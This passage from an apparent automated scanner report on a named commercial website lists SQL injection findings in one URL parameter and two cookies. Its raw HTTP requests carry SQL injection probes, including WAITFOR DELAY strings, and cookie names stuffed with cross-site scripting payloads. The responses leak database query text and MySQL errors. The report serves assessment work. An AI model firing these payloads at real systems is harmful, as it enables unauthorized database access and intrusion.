P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j3e0snlr0vcnigosdh5qhd5km1; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/leadflow/caad00/project.php was not found on this server.</p>

1.84. http://www.insideup.com/ppc/leadflow/caad00/leadflow/caad00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/leadflow/caad00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/leadflow/caad00/project.php?catId=1;WAITFOR' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:57:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=seukppc4d9fsepoviarheguln4; path=/
Content-Length: 2286
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
d = prj.groupId    
    where prj.project_page_url = 'leadflow/caad00/leadflow/caad00/project.php?catId=1;WAITFOR'' OR prj.project_page_url = 'leadflow/caad00/leadflow/caad00/project.php?catId=1;WAITFOR'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/caad00/leadflow/caad00/project.php?catId=1;WAITFOR'/'
   union select prj' at line 5

Request 2

GET /ppc/leadflow/caad00/leadflow/caad00/project.php?catId=1;WAITFOR'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:57:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=itfgafb5k0moc4430h984na7g4; path=/
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/leadflow/caad00/project.php was not found on this server.</p>

1.85. http://www.insideup.com/ppc/leadflow/caad00/project.php [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the JSESSIONID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267'; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=eir6gsf5vi069bv5c9an2h9pq1; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.86. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee'; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4jcithjpoofk5kt7b25oq80a31; path=/
Content-Length: 6630
Connection: close
